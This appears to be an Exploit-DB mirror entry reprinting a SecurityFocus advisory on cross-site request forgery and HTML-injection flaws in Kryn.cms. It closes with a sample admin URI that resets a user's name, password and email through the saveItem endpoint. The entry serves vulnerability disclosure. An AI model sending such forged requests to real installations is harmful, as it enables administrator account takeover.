exploit-db-mirror/platforms/multiple/webapps/34224.txt
Offensive Security 3b17f5b086 Updated 08_02_2014
2014-08-02 04:38:21 +00:00

9 lines
No EOL
731 B
Text
Executable file

source: http://www.securityfocus.com/bid/41229/info
Kryn.cms is prone to a cross-site request-forgery vulnerability and an HTML-injection vulnerability.
Exploiting these issues may allow a remote attacker to perform certain administrative actions, gain unauthorized access to the affected application, delete certain data, execute arbitrary script or HTML code within the context of the browser, and steal cookie-based authentication credentials. Other attacks are also possible.
The following example URI is available:
http://www.example.com/admin/backend/window/loadClass/saveItem?noCache=1277145391050&rsn=1&username=admin&passwd=admin&email=suck2%40example.org&groups=[%221%22]&module=users&code=users%2FeditMe%2F